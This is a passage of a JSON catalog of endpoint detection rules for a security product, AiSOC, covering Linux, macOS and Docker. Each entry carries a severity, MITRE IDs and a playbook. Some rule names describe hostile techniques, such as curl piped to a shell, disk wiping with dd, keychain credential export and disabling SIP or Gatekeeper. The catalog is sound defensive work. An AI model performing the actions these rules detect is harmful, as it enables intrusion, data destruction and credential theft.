"description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'base64 Decoded Then Executed In Shell'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1027" ], "log_source": "linux", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-base64-decode-then-execve.yaml" }, { "id": "det-endpoint-178", "type": "detection", "name": "Likely Cryptominer Process Detected", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Likely Cryptominer Process Detected'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1496" ], "log_source": "linux", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-cryptominer-process.yaml" }, { "id": "det-endpoint-179", "type": "detection", "name": "shred Used Against Production Data Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'shred Used Against Production Data Path'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1485" ], "log_source": "linux", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-shred-on-prod-data.yaml" }, { "id": "det-endpoint-180", "type": "detection", "name": "dd Writing /dev/zero To Block Device", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'dd Writing /dev/zero To Block Device'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1561.002" ], "log_source": "linux", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-wipe-disk-dd.yaml" }, { "id": "det-endpoint-181", "type": "detection", "name": "Multiple Critical Services Stopped In Quick Burst", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Multiple Critical Services Stopped In Quick Burst'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1489" ], "log_source": "linux", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-systemctl-mass-stop.yaml" }, { "id": "det-endpoint-182", "type": "detection", "name": "Mass File Rename To Ransom Marker Extension", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Mass File Rename To Ransom Marker Extension'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1486" ], "log_source": "linux", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-mass-rename-suspicious-ext.yaml" }, { "id": "det-endpoint-183", "type": "detection", "name": "Process Executed From /proc/self/fd Anonymous Inode", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Process Executed From /proc/self/fd Anonymous Inode'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1620" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-fileless-via-procfd.yaml" }, { "id": "det-endpoint-184", "type": "detection", "name": "wget Pulling From Newly Registered TLD", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'wget Pulling From Newly Registered TLD'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1105" ], "log_source": "linux", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-wget-suspicious-tld.yaml" }, { "id": "det-endpoint-185", "type": "detection", "name": "chmod +x Applied To File In /tmp", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'chmod +x Applied To File In /tmp'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1222.002" ], "log_source": "linux", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-chmod-plus-x-tmp.yaml" }, { "id": "det-endpoint-186", "type": "detection", "name": "execve From /dev/shm", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'execve From /dev/shm'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1059.004" ], "log_source": "linux", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-execve-from-dev-shm.yaml" }, { "id": "det-endpoint-187", "type": "detection", "name": "systemd-portable Image Attached", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'systemd-portable Image Attached'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1543.002" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-systemd-portable-attach.yaml" }, { "id": "det-endpoint-188", "type": "detection", "name": "modprobe Loaded Module From /tmp", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'modprobe Loaded Module From /tmp'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1547.006" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-modprobe-suspicious.yaml" }, { "id": "det-endpoint-189", "type": "detection", "name": "LD_PRELOAD Pointing To /tmp", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'LD_PRELOAD Pointing To /tmp'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1574.006" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-ld-preload-set-tmp.yaml" }, { "id": "det-endpoint-190", "type": "detection", "name": "yum/dnf Added Repo From Untrusted Domain", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'yum/dnf Added Repo From Untrusted Domain'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1195.002" ], "log_source": "linux", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-yum-add-untrusted-repo.yaml" }, { "id": "det-endpoint-191", "type": "detection", "name": "LaunchDaemon Plist Written To /Library/LaunchDaemons", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'LaunchDaemon Plist Written To /Library/LaunchDaemons'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1543.001" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-launchdaemon-write-system.yaml" }, { "id": "det-endpoint-192", "type": "detection", "name": "User LaunchAgent Plist Created", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'User LaunchAgent Plist Created'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1543.004" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-launchagent-write-user.yaml" }, { "id": "det-endpoint-193", "type": "detection", "name": "Login Item Added Via osascript", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Login Item Added Via osascript'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1547.015" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-loginitem-add.yaml" }, { "id": "det-endpoint-194", "type": "detection", "name": "PlistBuddy Used By Non-System Process", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'PlistBuddy Used By Non-System Process'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1547" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-plistbuddy-from-non-system.yaml" }, { "id": "det-endpoint-195", "type": "detection", "name": "Apple emond Rule Installed", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Apple emond Rule Installed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1546.014" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-emond-installed.yaml" }, { "id": "det-endpoint-196", "type": "detection", "name": "/private/etc/periodic Script Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by '/private/etc/periodic Script Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1037" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-periodic-script-modified.yaml" }, { "id": "det-endpoint-197", "type": "detection", "name": "User crontab Created (Rare On macOS)", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'User crontab Created (Rare On macOS)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1053.003" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-cron-tab-create.yaml" }, { "id": "det-endpoint-198", "type": "detection", "name": "~/.ssh/authorized_keys Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by '~/.ssh/authorized_keys Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1098.004" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-ssh-authorized-keys-append.yaml" }, { "id": "det-endpoint-199", "type": "detection", "name": "MDM Enrollment Profile Removed", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'MDM Enrollment Profile Removed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-mdm-enrollment-removed.yaml" }, { "id": "det-endpoint-200", "type": "detection", "name": "Configuration Profile Installed", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Configuration Profile Installed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1078.003" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-config-profile-installed.yaml" }, { "id": "det-endpoint-201", "type": "detection", "name": "com.apple.loginitems Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'com.apple.loginitems Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1547.015" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-com-apple-loginitems-modified.yaml" }, { "id": "det-endpoint-202", "type": "detection", "name": "Custom .app Bundle Written To /Users/Shared", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Custom .app Bundle Written To /Users/Shared'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1574.002" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-app-bundle-shared.yaml" }, { "id": "det-endpoint-203", "type": "detection", "name": "spctl --master-disable (Gatekeeper Off)", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'spctl --master-disable (Gatekeeper Off)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1553.001" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-spctl-master-disable.yaml" }, { "id": "det-endpoint-204", "type": "detection", "name": "csrutil disable (SIP Off)", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'csrutil disable (SIP Off)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1553" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-csrutil-disable.yaml" }, { "id": "det-endpoint-205", "type": "detection", "name": "nvram boot-args Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'nvram boot-args Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1542.001" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-nvram-boot-args.yaml" }, { "id": "det-endpoint-206", "type": "detection", "name": "com.apple.quarantine xattr Stripped", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'com.apple.quarantine xattr Stripped'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1553.001" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-quarantine-attribute-removed.yaml" }, { "id": "det-endpoint-207", "type": "detection", "name": "TCC Database Modified Outside tccd", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'TCC Database Modified Outside tccd'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-tcc-db-direct-write.yaml" }, { "id": "det-endpoint-208", "type": "detection", "name": "kextload Of Unsigned Kernel Extension", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'kextload Of Unsigned Kernel Extension'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1547.006" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-kextload-unsigned.yaml" }, { "id": "det-endpoint-209", "type": "detection", "name": "XProtect Updates Disabled", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'XProtect Updates Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-xprotect-disabled.yaml" }, { "id": "det-endpoint-210", "type": "detection", "name": "Application Firewall Disabled", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Application Firewall Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1562.004" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-firewall-disabled.yaml" }, { "id": "det-endpoint-211", "type": "detection", "name": "App Store Receipt File Tampered", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'App Store Receipt File Tampered'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1562" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-mas-receipt-tamper.yaml" }, { "id": "det-endpoint-212", "type": "detection", "name": "codesign --force --deep Used By User", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'codesign --force --deep Used By User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1553.002" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-codesign-force-bypass.yaml" }, { "id": "det-endpoint-213", "type": "detection", "name": "security export Used Against Login Keychain", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'security export Used Against Login Keychain'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1555.001" ], "log_source": "macos", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-security-export-keychain.yaml" }, { "id": "det-endpoint-214", "type": "detection", "name": "security find-generic-password Used", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'security find-generic-password Used'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1555.001" ], "log_source": "macos", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-security-find-generic-password.yaml" }, { "id": "det-endpoint-215", "type": "detection", "name": "login.keychain-db Read By Non-Owner UID", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'login.keychain-db Read By Non-Owner UID'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1555.001" ], "log_source": "macos", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-keychain-db-read-by-other-uid.yaml" }, { "id": "det-endpoint-216", "type": "detection", "name": "screencapture Binary Used", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'screencapture Binary Used'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1113" ], "log_source": "macos", "playbook": "tpl-collection", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-screencapture-binary.yaml" }, { "id": "det-endpoint-217", "type": "detection", "name": "osascript Used To Read Keychain", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'osascript Used To Read Keychain'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1555.001" ], "log_source": "macos", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-osascript-keychain-access.yaml" }, { "id": "det-endpoint-218", "type": "detection", "name": "defaults Wrote To com.apple.loginwindow", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'defaults Wrote To com.apple.loginwindow'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1547.005" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-defaults-com-apple-loginwindow.yaml" }, { "id": "det-endpoint-219", "type": "detection", "name": "iCloud Keychain Sync Toggled Off", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'iCloud Keychain Sync Toggled Off'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1562" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-icloud-keychain-toggle.yaml" }, { "id": "det-endpoint-220", "type": "detection", "name": "SystemExtension Loaded From Non-Apple Bundle", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'SystemExtension Loaded From Non-Apple Bundle'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1547.006" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-systemextension-load-non-apple.yaml" }, { "id": "det-endpoint-221", "type": "detection", "name": "osascript do shell script with administrator privileges", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'osascript do shell script with administrator privileges'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1059.002", "T1548.004" ], "log_source": "macos", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-osascript-do-shell-script.yaml" }, { "id": "det-endpoint-222", "type": "detection", "name": "launchctl Loading Plist From /tmp", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'launchctl Loading Plist From /tmp'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1543.001" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-launchctl-load-from-tmp.yaml" }, { "id": "det-endpoint-223", "type": "detection", "name": "curl Output Piped To Shell", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'curl Output Piped To Shell'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1105" ], "log_source": "macos", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-curl-pipe-shell.yaml" }, { "id": "det-endpoint-224", "type": "detection", "name": "DYLD_INSERT_LIBRARIES Set To /tmp Or User Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'DYLD_INSERT_LIBRARIES Set To /tmp Or User Path'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1574.006" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-dyld-insert-libraries.yaml" }, { "id": "det-endpoint-225", "type": "detection", "name": "com.apple.dock Modified By Non-System Process", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'com.apple.dock Modified By Non-System Process'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1547.005" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-dock-modified.yaml" }, { "id": "det-endpoint-226", "type": "detection", "name": "systemsetup Enabled Remote Login (SSH)", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'systemsetup Enabled Remote Login (SSH)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1021.004" ], "log_source": "macos", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-systemsetup-remote-login.yaml" }, { "id": "det-endpoint-227", "type": "detection", "name": "hyperkit Launched From Non-Standard Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'hyperkit Launched From Non-Standard Path'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1610" ], "log_source": "macos", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-hyperkit-launch-untrusted.yaml" }, { "id": "det-endpoint-228", "type": "detection", "name": "Mach-O Binary Executed From /Users/Shared", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Mach-O Binary Executed From /Users/Shared'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1059.004" ], "log_source": "macos", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-binary-from-shared.yaml" }, { "id": "det-endpoint-229", "type": "detection", "name": "tccutil reset All Subsystems", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'tccutil reset All Subsystems'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-tccutil-reset-all.yaml" }, { "id": "det-endpoint-230", "type": "detection", "name": "Find My Mac Disabled", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Find My Mac Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1562" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-find-iphone-disabled.yaml" }, { "id": "det-endpoint-231", "type": "detection", "name": "Docker Daemon Listening On TCP Socket", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Docker Daemon Listening On TCP Socket'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1610" ], "log_source": "docker", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/container-docker-tcp-listening.yaml" }, { "id": "det-endpoint-232", "type": "detection", "name": "Production Container Pulled From Public Registry", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Production Container Pulled From Public Registry'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1525" ], "log_source": "docker", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/container-image-from-public-registry.yaml" }, { "id": "det-endpoint-233", "type": "detection", "name": "Container Pulled With :latest Tag In Production", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Container Pulled With :latest Tag In Production'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1525" ], "log_source": "docker", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", 